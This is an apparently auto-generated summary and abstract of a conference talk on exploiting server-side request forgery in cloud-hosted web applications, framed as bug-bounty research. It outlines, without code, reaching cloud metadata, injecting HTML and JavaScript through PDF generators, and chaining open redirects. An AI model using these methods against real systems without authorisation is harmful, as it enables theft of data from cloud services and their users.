Owning The Cloud Through Server-Side Request Forgery

The presentation discusses various methods of exploiting vulnerabilities in web applications, including using APIs, metadata, and PDF generation. The speaker emphasizes the importance of finding creative ways to bypass security measures and highlights the usefulness of customization options in PDF generation.

• APIs and metadata can be exploited to gain access to sensitive information
• Customization options in PDF generation can be used to inject HTML and JavaScript
• Open redirects should not be burned as they can be useful in exploiting vulnerabilities
• Finding creative ways to bypass security measures is crucial in successful exploitation

The speaker shares a story about how they spent three months trying to figure out how to exploit a vulnerability in Wheezy Print, a simple Python library. They eventually discovered that they could send an image source to their server and get the user agent, which allowed them to replicate the vulnerability in their own environment.

With how many apps are running in the cloud, hacking these instances becomes easier with a simple vulnerability due to an unsanitized user input. In this talk, we’ll discuss a number of different methods that helped us exfil data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.